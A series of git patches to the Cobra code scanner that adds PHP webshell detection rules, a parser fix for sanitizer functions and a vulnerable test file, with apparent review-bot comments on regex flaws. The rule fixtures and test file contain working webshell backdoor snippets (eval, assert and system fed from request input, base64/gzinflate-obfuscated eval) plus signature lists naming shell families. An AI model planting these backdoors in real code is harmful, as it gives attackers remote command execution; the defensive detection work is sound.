mode="regex-only-match"><![CDATA[\s*(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|include)\s*\(\s*(file_get_contents\s*\(\s*)?['\"]php://input]]></match> <level value="7"/> <test> <case assert="true"><![CDATA[ diff --git a/rules/CVI-360028.xml b/rules/CVI-360028.xml index ee59faee..62c80c0d 100644 --- a/rules/CVI-360028.xml +++ b/rules/CVI-360028.xml 
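Review bot: Removing the `(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})` alternative from the CVI-360013 regex means the classic two-line shell `$q = $_POST['c']; create_function('$a', $q);` is no longer caught by this rule, and the hunk leaves the `<case assert="true"><![CDATA[]]></case>` fixture empty so nothing pins what the rule still detects. If the intent is that the superglobal case is now handled by `create_function` being in CVI-180001's `function-param-controllable` list, say so in `<solution>`; otherwise keep the alternative. Either way add a real positive case here, e.g. `$sa = "eval()"; create_function('xxx', $sa);`, and a negative one for a literal callback body.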
@@ -6,6 +6,9 @@ <level value="7"/> <test> <case assert="true"><![CDATA[eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtFeDVPRGhRTTBKdlkwRndiR1J0Um5OTFExSm1WVVU1VkZaR2RHdGlNamw1V0ZOclMweDVPQzVqYUhJb05EY3BMbEJuS1NrNykpOw));]]></case> + <case assert="true"><![CDATA[ + eval(gzinflate(base64_decode('s7ezsS/IKFBwSC1LzNFQiQ/wDw6JVlcpL9a1CyrNU4/VtE7OyM1PUQBKBbsGhbkGRSsFOwd5BoTEu3n6uPo5+roqxeoYmJiYaFrbA40CAA=='))); + ]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360031.xml b/rules/CVI-360031.xml index 2b43470f..779dd9f7 100644 --- a/rules/CVI-360031.xml +++ b/rules/CVI-360031.xml @@ -4,10 +4,24 @@ <language value="php"/> <match mode="regex-only-match"><![CDATA[ini_get\s*\(\s*\"disable_functions\"\s*\)|\d\s*=>\s*array\s*\(\s*['\"]\s*pipe\s*['\"]|gzuncompress\(base64_decode\(|crypt\(\$_SERVER\['HTTP_H0ST'\],\d+\)==|if\(file_exists\(\$settings\['STOPFILE'\]\)\)]]></match> <level value="7"/> + <test> + <case assert="true"><![CDATA[ + function zWM($NXlKO){ + $NXlKO=gzuncompress(base64_decode($NXlKO)); + for($i=0;$i<strlen($NXlKO);$i++){ + $NXlKO[$i] = chr(ord($NXlKO[$i])-1); + } + return $NXlKO; + } + ]]></case> + </test> <solution> ## 安全风险 代码中存在webshell + 特征 `gzuncompress\(base64_decode` 对应webshell样例 + [link](https://github.com/tennc/webshell/blob/4ca96011884b892ec15de130f76eb2a047b77493/php/BNKQbAKQ.txt) + ## 修复方案 删除 </solution> diff --git a/rules/CVI-360032.xml b/rules/CVI-360032.xml index 5a32e9df..cf5f9d23 100644 --- a/rules/CVI-360032.xml +++ b/rules/CVI-360032.xml 
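Review bot: The new CVI-360031 test case is a plain `gzuncompress(base64_decode(...))` decode helper with no `eval`/`assert` anywhere, and the rule reports it as a level-7 webshell purely on the `gzuncompress\(base64_decode\(` alternative; that idiom is also how many legitimate applications unpack cached or transported payloads, so this fixture documents a false-positive pattern rather than a shell. Either add an `assert="false"` case showing the decode-only form is tolerated and tighten the alternative to require a nearby sink (e.g. `(eval|assert)\s*\(\s*gzuncompress\s*\(\s*base64_decode\s*\(`), or state in `<solution>` that this signature is intentionally broad and why.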
@@ -4,10 +4,18 @@ <language value="php"/> <match mode="regex-only-match"><![CDATA[\$nofuncs='no\s*exec\s*functions|udf\.dll|\$b374k|POWER-BY\s*WWW.XXDDOS.COM|<title>Safes\s*Mode\s*Shell|Siyanur\.PHP\s*|c999shexit\(\)|\$c99sh_|c99_sess_put\(|Coded\s*by\s*cyb3r|cyb3r_getupdate\(|coded\s*by\s*tjomi4|john\.barker446@gmail\.com|eval\(\"\\\$x=gzin\"|eval\(\"\?>\"\.gzinflate\(base64_decode\(|eval\(gzinflate\(base64_decode\(|eval\(gzuncompress\(base64_decode\(|eval\(gzinflate\(str_rot13\(base64_decode\(|function_exists\(\"zigetwar_buff_prepare\"\)|dQ99shell|r57shell|c99shell|lama's'hell\s*v|Carbylamine\s*PHP\s*Encoder|Safe\s*Mode\s*Shell|\$dI3h=\${'_REQUEST'};|new\s*COM\(\"IIS://localhost/w3svc\"\)|n57http-based\[\s*-\]terminal|Dosya\s*Olu|errorlog\(\"BACKEND:\s*startReDuh,|form\s*name=sh311Form|PHPJackal
|Reddragonfly's\s*WebShell|\(\"system\"==\$seletefunc\)\?system\(\$shellcmd\)|eNrsvGmT40iSKPZ5xmz|CrystalShell\s*v\.|Special\s*99\s*Shell|Simple\s*PHP\s*Mysql\s*client|'_de'\.'code'|phpsocks5_encrypt\(|define\('PHPSHELL_VERSION',|ZXZhbCgkX1BPU1RbMV0p|\$__H_H\(\$__C_C"]]>
+ +

'.sh_name().'

.: r57.biz Dq99Shell :. + ]]>
+
## 安全风险 代码中存在webshell + 特征 `dQ99shell` 对应webshell样例 + [link](https://github.com/tennc/webshell/blob/4ca96011884b892ec15de130f76eb2a047b77493/www-7jyewu-cn/%E5%9B%BD%E5%A4%96%E5%85%8D%E6%9D%80PHP%E5%A4%A7%E9%A9%AC_%E6%9C%AA%E7%BF%BB%E8%AF%91.php) + ## 修复方案 删除 diff --git a/rules/CVI-360033.xml b/rules/CVI-360033.xml index 9f77cf83..14ae5598 100644 --- a/rules/CVI-360033.xml +++ b/rules/CVI-360033.xml @@ -1,13 +1,40 @@ - + |define\('envlpass',|KingDefacer_getupdate\(|relative2absolute\(|Host:\s*old.zone-h.org|
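Review bot: The test case added to CVI-360032 contains `r57.biz Dq99Shell`, but the signature it is meant to exercise is the unchanged alternative `dQ99shell` in the match regex; the two differ in case, so the case only passes if the engine matches case-insensitively. Nothing on this page shows a `-i`/`(?i)` flag, and the `//cvi-360032` sample in `tests/vulnerabilities/v.php` later in this series is committed commented out, which is consistent with it not matching. Either make the alternative `[dD][qQ]99[sS]hell` (or add `(?i)` to that branch) or change the fixture to the spelling the regex actually contains. Parts of this hunk's CDATA were lost to markup stripping, so I am reading the surviving fragments.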

PHPKonsole

|\$_SESSION\['hassubdirs'\]\[\$treeroot\]|strtolower\(\$cmd\)\s*==\s*\"canirun\"|\$shell\s*=\s*'uname\s*-a;\s*w;\s*id;|Avrasya\s*Veri\s*ve\s*NetWork|

Linux Shells

|\$MyShellVersion\s*=\s*\"MyShell|PHP\s*Shell\s*[^\n\r]*|\$OOO000000=urldecode|1MSSYowqjzlVVAwAoHHFXzQ5Lc|'xiaoqiwangluo'|EqQC1FhyXxpEi7l2g\+yNjW62S|\$_uU\(83\)\.\$_uU\(84\)|7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8|\s*ARS\s*Terminator\s*Shell|base64_decode\(\"R0lGODdhEgASAKEAAO7u7gAAAJmZmQAAACwAAA|\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00|'W3D\s*Shell|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsD]]></match> <level value="7"/> + <test> + <case assert="true"><![CDATA[ + $shver = "Emp3ror Undetectable #18"; //Current version + //CONFIGURATION AND SETTINGS + if (!empty($unset_surl)) {setcookie("N3tsh_surl"); $surl = "";} + elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("N3tsh_surl",$surl);} + else {$surl = $_REQUEST["N3tsh_surl"]; //Set this cookie for manual SURL + } + ]]></case> + <case assert="true"><![CDATA[ + function Tihuan_Auto($tp,$tt,$th,$tca,$tcb,$td,$tb) + { + if(($h_d = @opendir($tp)) == NULL) return false; + while(false !== ($Filename = @readdir($h_d))) + .... + } + ]]></case> + </test> <solution> ## 安全风险 代码中存在webshell + 特征 `setcookie("N3tsh_surl");` 对应webshell样例 + [link](https://github.com/tennc/webshell/blob/e2fd7eed0ca27430af65862bdcefd4bc268805f2/web-malware-collection-13-06-2012/PHP/c99.txt) + + 特征 `function Tihuan_Auto` 对应webshell样例 + [link](https://github.com/tennc/webshell/blob/4ca96011884b892ec15de130f76eb2a047b77493/php/ghost_source.php) + + 特征 `http://www.7jyewu.cn/` 对应webshell样例 + [link](https://github.com/tennc/webshell/blob/4ca96011884b892ec15de130f76eb2a047b77493/www-7jyewu-cn/DOC_ZIBSZXBIEG.php) + ## 修复方案 删除 </solution> diff --git a/rules/CVI-360035.xml b/rules/CVI-360035.xml new file mode 100644 index 00000000..9ac1a218 --- /dev/null +++ b/rules/CVI-360035.xml 
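Review bot: The CVI-360033 match regex (as far as it is readable here—part of the CDATA was lost to markup stripping) contains the alternative `PHP\s*Shell\s*[^\n\r]*`, which flags any line with the words "PHP Shell" in it as a level-7 webshell, including ordinary comments and documentation strings, and the trailing `[^\n\r]*` adds nothing to the decision while inflating the reported match. Drop the trailing `[^\n\r]*` and anchor the alternative to something the shells actually emit (a title or version string) rather than the bare phrase. The second added test case also contains a `....` placeholder inside PHP code; it is harmless for a regex rule but makes the fixture unusable for any AST-based check, so either complete it or trim it to the `function Tihuan_Auto(` line the `<solution>` text names as the signature.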
@@ -0,0 +1,35 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell35"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[(new\s*ReflectionFunction|new\s*ArrayObject[\s\S]*->u[ak]sort)\s*\(+\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^'\"]*\x).{0,200}|(\$_(GET|POST|REQUEST|COOKIE)\[[^,;\)]{0,250}\)))]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[ + $arr = new ArrayObject(array('test', $_REQUEST['pass'])); + $arr->uasort('assert'); + ]]></case> + <case assert="true"><![CDATA[ + $arr = new ArrayObject(array('test' => 1, $_REQUEST['pass'] => 2)); + $arr->uksort('assert'); + ]]></case> + <case assert="true"><![CDATA[ + $func = new ReflectionFunction("system"); + echo $func->invokeArgs(array("$_GET[c]")); + ]]></case> + <case assert="true"><![CDATA[ + $func = new ReflectionFunction($_GET[m]); + echo $func->invokeArgs(array($_GET[c],$_GET[id])); + ]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + [webshell样例](https://github.com/tennc/webshell/blob/master/php/p2j/PHP%20reflection.php.txt) + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360036.xml b/rules/CVI-360036.xml new file mode 100644 index 00000000..890ad34d --- /dev/null +++ b/rules/CVI-360036.xml 
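Review bot: In the new CVI-360035 regex the alternative `[^'\"]*\x)` ends in a bare `\x` followed by `)`; under PCRE (`grep -P`) `\x` with no hex digits matches a NUL byte, and under Python `re` it is an "incomplete escape" error, so this branch either never matches PHP source or breaks the rule. The sibling rules spell the hex-escaped name as `ass\\x65rt`, so the intent was almost certainly a literal `\x` in the PHP string; write `[^'\"]*\\x`. Also `new\s*ReflectionFunction` and `new\s*ArrayObject` accept zero whitespace, which is not valid PHP; `\s+` keeps the rule honest without losing any real case.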
@@ -0,0 +1,23 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell36"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[\$\s*(\w+)\s*=[\s\(\{]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec))[\s\S]{0,200}\b(new\s*ReflectionFunction|new\s*ArrayObject[\s\S]*->u[ak]sort)\b\s*\(+\s*(\$\s*\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1))]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[ + $a = 'assert'; + $arr = new ArrayObject(array('test', $_REQUEST['pass'])); + $arr->uasort($a); + ]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> diff --git a/rules/vulnerabilities.xml b/rules/vulnerabilities.xml index 898bda23..8223c674 100644 --- a/rules/vulnerabilities.xml +++ b/rules/vulnerabilities.xml @@ -24,6 +24,7 @@ <vulnerability name="VO" vid="320"/> <vulnerability name="WF" vid="350"/> <vulnerability name="WE" vid="355"/> + <vulnerability name="WS" vid="360"/> <vulnerability name="AV" vid="970"/> <vulnerability name="IV" vid="980"/> <vulnerability name="IC" vid="999"/> From 78025ad2bcb0802722dde75c878790a35c9fe810 Mon Sep 17 00:00:00 2001 From: BlBana <635373043@qq.com> Date: Thu, 7 Sep 2017 16:07:48 +0800 Subject: [PATCH 20/29] FPC-Mode vuls repair, fixed #559 --- cobra/engine.py | 5 +++-- cobra/parser.py | 12 +++++++++--- 2 files changed, 12 insertions(+), 5 deletions(-) diff --git a/cobra/engine.py b/cobra/engine.py index 4aae64e7..84caa107 100644 --- a/cobra/engine.py +++ b/cobra/engine.py 
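Review bot: The back-reference at the end of the CVI-360036 regex, `\$\s*\1`, has no word boundary, so after `$a = 'assert';` any later `->uasort($abc)` or `->uksort($a_cmp)` also satisfies the rule and is reported as a webshell; the same construction in CVI-360013/360021 has the same weakness. Append `\b` to both back-reference branches, i.e. `(\$\s*\1\b|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1\b))`. The single test case only exercises the `ArrayObject` branch; add `$f = 'system'; $r = new ReflectionFunction($f);` so the `ReflectionFunction` alternative is covered too.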
@@ -621,12 +621,13 @@ def scan(self): try: ast = CAST(self.rule_match, self.target_directory, self.file_path, self.line_number, self.code_content) if self.rule_match_mode == const.mm_function_param_controllable: - rule_match = self.rule_match.strip('()').split('|') + rule_match = self.rule_match.strip('()').split('|') # 漏洞规则整理为列表 + rule_repair = self.rule_repair.strip('()').split('|') # 修复规则整理为列表 logger.debug('[RULE_MATCH] {r}'.format(r=rule_match)) try: with open(self.file_path, 'r') as fi: code_contents = fi.read() - result = scan_parser(code_contents, rule_match, self.line_number) + result = scan_parser(code_contents, rule_match, self.line_number, rule_repair) logger.debug('[AST] [RET] {c}'.format(c=result)) if len(result) > 0: if result[0]['code'] == 1: # 函数参数可控 diff --git a/cobra/parser.py b/cobra/parser.py index f3dc3db3..39c0f04a 100644 --- a/cobra/parser.py +++ b/cobra/parser.py @@ -18,6 +18,7 @@ with_line = True scan_results = [] # 结果存放列表初始化 +repairs = [] # 用于存放修复函数 def export(items): @@ -213,8 +214,10 @@ def is_repair(expr): :return: """ is_re = False # 是否修复,默认值是未修复 - if expr == 'escapeshellcmd': - is_re = True + for repair in repairs: + if expr == repair: + is_re = True + return is_re return is_re @@ -661,16 +664,19 @@ def analysis(nodes, vul_function, back_node, vul_lineo, function_params=None): back_node.append(node) -def scan_parser(code_content, sensitive_func, vul_lineno): +def scan_parser(code_content, sensitive_func, vul_lineno, repair): """ 开始检测函数 :param code_content: 要检测的文件内容 :param sensitive_func: 要检测的敏感函数,传入的为函数列表 :param vul_lineno: 漏洞函数所在行号 + :param repair: 对应漏洞的修复函数列表 :return: """ try: + global repairs global scan_results + repairs = repair scan_results = [] parser = make_parser() all_nodes = parser.parse(code_content, debug=False, lexer=lexer.clone(), tracking=with_line) From c3fec5e6d13ce4bab40d6be7c6d823d06e4903b9 Mon Sep 17 00:00:00 2001 
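Review bot: `rule_repair = self.rule_repair.strip('()').split('|')` assumes every `function-param-controllable` rule has a `<repair>` element; for a rule without one `self.rule_repair` is presumably `None` and this raises `AttributeError` before `scan_parser` is called (a later patch in this series adds the `is not None` guard, so the remaining concern is the contract). Elsewhere in this series `<repair>` is a regex (`in_array\s*\(\s*{{PARAM}}\s*,`, `(htmlspecialchars\s*\(\s*{{PARAM}}\s*)`), but `is_repair` compares the split pieces with `==` against AST function names, so any regex syntax that survives `strip('()')` silently disables the repair. Document the new contract where the list is built, e.g. `# <repair> in FPC mode is a plain "|"-separated list of sanitizer function names, not a regex`, and consider warning when a piece is not a valid identifier. The enclosing `scan()` starts and ends outside this hunk.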
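Review bot: `is_repair` compares `expr == repair` exactly, but PHP function names are case-insensitive, so `HtmlSpecialChars($x)` or `EscapeShellCmd($x)` is treated as unsanitized and reported even though the repair function is applied; compare case-folded, `return expr.lower() in {r.lower() for r in repairs}`, which also replaces the loop-and-flag body. Storing the list in the module-level `repairs` global, set from `scan_parser`, makes the parser non-reentrant—two concurrent or nested scans would see each other's repair lists—so passing the list through `analysis()` to `is_repair()` would be safer; I cannot see `analysis()`'s full signature here. The `def is_repair(expr):` line appears only in the hunk header, so the function starts outside this hunk.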
From: braveghz <braveghz@gmail.com> Date: Thu, 7 Sep 2017 17:28:14 +0800 Subject: [PATCH 21/29] Merge branch 'master' of github.com:braveghz/cobra # Conflicts: # rules/CVI-220001.xml # rules/CVI-360004.xml # rules/CVI-360005.xml # rules/CVI-360007.xml # rules/CVI-360012.xml # rules/CVI-360020.xml # rules/CVI-360021.xml # tests/vulnerabilities/webshell.php --- rules/CVI-360007.xml | 1 + rules/CVI-360012.xml | 9 +++++++-- rules/CVI-360013.xml | 2 +- rules/CVI-360014.xml | 2 +- rules/CVI-360015.xml | 8 +++++++- rules/CVI-360020.xml | 5 +++-- rules/CVI-360021.xml | 4 ++-- 7 files changed, 22 insertions(+), 9 deletions(-) diff --git a/rules/CVI-360007.xml b/rules/CVI-360007.xml index 62b8cea4..af9e60a1 100644 --- a/rules/CVI-360007.xml +++ b/rules/CVI-360007.xml @@ -6,6 +6,7 @@ <level value="7"/> <test> <case assert="true"><![CDATA[call_user_func('assert', $arr);]]></case> + <case assert="true"><![CDATA[@array_map("ass\x65rt", (array) @$cmd);]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360012.xml b/rules/CVI-360012.xml index 1bcd3f0d..04118bcb 100644 --- a/rules/CVI-360012.xml +++ b/rules/CVI-360012.xml 
@@ -2,15 +2,20 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell12"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[\$(\w*)\s*=\s*\bcreate_function\b\s*\([^;]*;[\s\S]*\$\1\s*\([^\)]*(['\"]\s*[^;\n\r\)]{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|poc_open|pcntl_exec).{1,600}\s*['\"]|[^;\n\r]{0,100}(\$_(GET|POST|REQUEST|COOKIE|SERVER).{1,})|[^;\n\r\)]{0,100}file_get_contents.{1,})]]></match> + <match mode="regex-only-match"><![CDATA[\$(\w*)\s*=\s*@?create_function\s*\([^;]*;[\s\S]*\$\1\s*\([^\)]*(['\"]\s*[^;\n\r\)]{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|poc_open|pcntl_exec).{1,600}\s*['\"]|[^;\n\r]{0,100}(\$_(GET|POST|REQUEST|COOKIE|SERVER).{1,})|[^;\n\r\)]{0,100}file_get_contents.{1,})]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[$newfunc = create_function('str','return str');$newfunc("$_POST['c']");]]></case> + <case assert="true"><![CDATA[ + $func=@create_function('$x','ev'.'al'.'(gz'.'inf'.'late'.'(bas'.'e64'.'_de'.'co'.'de($x)));'); + $func($_GET['func']); + ]]></case> </test> <solution> ## 安全风险 代码中存在webshell + [webshell样例](https://github.com/tennc/webshell/blob/4ca96011884b892ec15de130f76eb2a047b77493/php/b374k/b374k-2.4.poly.php) + ## 修复方案 删除 </solution> diff --git a/rules/CVI-360013.xml b/rules/CVI-360013.xml index 5f186e6e..e088828c 100644 --- a/rules/CVI-360013.xml +++ b/rules/CVI-360013.xml @@ -5,7 +5,7 @@ <match mode="regex-only-match"><![CDATA[\$\s*(\w+)\s*=[\s\(\{]*(['\"]\s*.{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec).{1,100}\s*['\"]|file_get_contents)[\s\S]{0,200}create_function\s*\(+[^,]{1,100},['\"\s]*(\$\s*\1['\"\s]*\)|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1))]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[]]></case> + <case assert="true"><![CDATA[$sa = "eval()"; create_function('xxx', $sa);]]></case> </test> <solution> ## 安全风险 
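Review bot: The rewritten CVI-360012 regex keeps `poc_open` in its dangerous-function alternation, a typo for `proc_open` that CVI-360011 shares, so `create_function` shells built around `proc_open(` slip past both rules; change it to `proc_open`. Adding `@?` before `create_function` is the right fix for the b374k sample, but the new fixture is the only positive case left, so the plain `$newfunc = create_function(...);$newfunc("$_POST['c']");` form that the old case covered should be kept as a second `assert="true"` case rather than replaced.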
diff --git a/rules/CVI-360014.xml b/rules/CVI-360014.xml index 4ef70460..463c4bf4 100644 --- a/rules/CVI-360014.xml +++ b/rules/CVI-360014.xml @@ -5,7 +5,7 @@ <match mode="regex-only-match"><![CDATA[\$\s*(\w+)\s*=\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)\s*\()[\s\S]{0,200}\s*\$\1\s*\(+[^\)]*(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[]]></case> + <case assert="true"><![CDATA[$a = "eval";$a($_GET['a']);]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360015.xml b/rules/CVI-360015.xml index df9048ae..0ad11515 100644 --- a/rules/CVI-360015.xml +++ b/rules/CVI-360015.xml @@ -5,7 +5,13 @@ <match mode="regex-only-match"><![CDATA[sqlite_create_function\s*\([\s\S]{0,200}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)[\s\S]{0,200}sqlite_create_function\s*\(]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[]]></case> + <case assert="true"><![CDATA[ + if ($dbhandle = sqlite_open('mysqlitedb', 0666, $sqliteerror)) { + sqlite_create_function($dbhandle, 'func', 'eval($cmd);', 1); + } else { + echo 'Error opening sqlite db: ' . $sqliteerror;exit; + } + ]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360020.xml b/rules/CVI-360020.xml index 5ac17520..d3104888 100644 --- a/rules/CVI-360020.xml +++ b/rules/CVI-360020.xml 
@@ -2,10 +2,11 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell20"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[array_walk(_recursive)?\s*\([^;,]*,\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|preg_replace)\s*['\"]|(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25}))]]></match> + <match mode="regex-only-match"><![CDATA[array_walk(_recursive)?\s*\([^;,]*,\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|preg_replace)|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\s*['\"])]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[]]></case> + <case assert="true"><![CDATA[array_walk($array, "eval");]]></case> + <case assert="true"><![CDATA[array_walk(xxx,base64_decode("ZXZhbA==");]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360021.xml b/rules/CVI-360021.xml index 350ae708..9d194db6 100644 --- a/rules/CVI-360021.xml +++ b/rules/CVI-360021.xml 
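Review bot: The new CVI-360020 regex drops the closing `\s*['\"]` after the dangerous-function name, so `['\"]\s*(eval|...|preg_replace)` now matches any quoted callback that merely starts with one of those words—`array_walk($rows, "exec_hook")` or `array_walk($a, 'system_format')`—and reports it as a level-7 webshell. Restore the terminator on that branch: `(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|preg_replace)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*['\"])`. The second test case `array_walk(xxx,base64_decode("ZXZhbA==");` is missing a `)`; it still matches, but a valid sample avoids confusing later AST-based checks.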
@@ -2,10 +2,10 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell21"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|preg_replace))[\s\S]{0,200}array_walk(_recursive)?\s*\([^;,]*,\s*(\$\s*\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1))]]></match> + <match mode="regex-only-match"><![CDATA[\$\s*(\w+)\s*=\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|preg_replace)|\w*)[\s\S]{0,200}array_walk(_recursive)?\s*\([^;,]*,\s*(\$\s*\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1))]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[]]></case> + <case assert="true"><![CDATA[$a = "ZXZhbA==";array_walk($array, base64_decode($a));]]></case> </test> <solution> ## 安全风险 From ca6336ef020e1784a1a12131fc3bcf1aa7e987c5 Mon Sep 17 00:00:00 2001 From: braveghz <braveghz@gmail.com> Date: Thu, 7 Sep 2017 17:29:12 +0800 Subject: [PATCH 22/29] v.php --- tests/vulnerabilities/v.php | 244 ++++++++++++++++++++++++++---------- 1 file changed, 175 insertions(+), 69 deletions(-) diff --git a/tests/vulnerabilities/v.php b/tests/vulnerabilities/v.php index 5e597b1d..1fae15ff 100644 --- a/tests/vulnerabilities/v.php +++ b/tests/vulnerabilities/v.php 
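Review bot: The `|\w*` alternative added to CVI-360021 can match the empty string, so the rule now reduces to "some `$var = ...;` followed within 200 characters by `array_walk(..., $var)`", and any legitimate variable callback such as `$cb = 'trim'; array_walk($arr, $cb);` is reported as a webshell. The `\w*` was evidently added to let the base64 fixture `$a = "ZXZhbA==";` through, so pair that looseness only with the decoder branch: keep `['\"]\s*(eval|...|preg_replace)` for the direct `\$\s*\1` use, and accept an arbitrary quoted literal only when the callback is `(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1`. As written the regex also lacks a `\b` after `\1`, so `$a` followed by `array_walk($x, $abc)` matches too.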
@@ -7,66 +7,63 @@ $cmd = $_REQUEST['a']; -echo($callback . ";"); +echo ($callback . ";"); +echo $callback; extract($cmd); -@array_map("ass\x65rt",(array)@$cmd); +@array_map("ass\x65rt", (array) @$cmd); $cmd = $_GET['cmd']; -if (!empty($cmd)){ - eval($cmd); - system('ls' + $cmd); +if (!empty($cmd)) { + eval($cmd); + system('ls'+$cmd); } if (isset($_GET['sid'])) { - setcookie("PHPSESSID", $cmd); + setcookie("PHPSESSID", $cmd); } phpinfo(); -if(!empty($url)) -{ - mkdir('log/'.date("Y"),0777); +if (!empty($url)) { + mkdir('log/' . date("Y"), 0777); } -function curl($url){ - $ch = curl_init(); - curl_setopt($ch, CURLOPT_URL, $url); - curl_setopt($ch, CURLOPT_HEADER, 0); - curl_exec($ch); - curl_close($ch); +// cvi-120001 +function curl($url) { + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, $url); + curl_setopt($ch, CURLOPT_HEADER, 0); + curl_exec($ch); + curl_close($ch); } $url = $_GET['url']; -if (!empty($url)){ - curl($cmd); +if (!empty($url)) { + curl($cmd); } $url = $_GET['url']; -if (!empty($url)){ - $content = file_get_contents($url); +if (!empty($url)) { + $content = file_get_contents($url); } $url = $_GET["url"]; -if (!empty($url)){ - echo get_headers($url,1); +if (!empty($url)) { + echo get_headers($url, 1); } print("Hello " . $cmd); -$query = "SELECT id, name, inserted, size FROM products WHERE size = '$size' ORDER BY $order LIMIT $limit, $offset;"; +$query = "SELECT id, name, inserted, size FROM products WHERE size = '$size' ORDER BY $order LIMIT $limit, $offset;"; mysql_query($query); mysqli_query($query); - -if(!empty($cmd)){ - require_once($cmd); - - // 这种扫不出来 - require $cmd; +if (!empty($cmd)) { + require_once $cmd; } highlight_file($cmd); 
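Review bot: This hunk deletes the `require $cmd;` sample together with its note `// 这种扫不出来` ("this one is not detected") instead of keeping it, so a known detection gap in the file-inclusion rules disappears from the regression fixture and nobody will notice when (or whether) it gets fixed. Keep the line with an English note, `require $cmd; // known miss: bare require without parentheses is not detected yet`, so the fixture records the gap. The `system('ls'+$cmd);` sample is also a PHP arithmetic expression rather than string concatenation (`'ls' . $cmd`); it still exercises the sink, but the fixture should show the realistic form.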
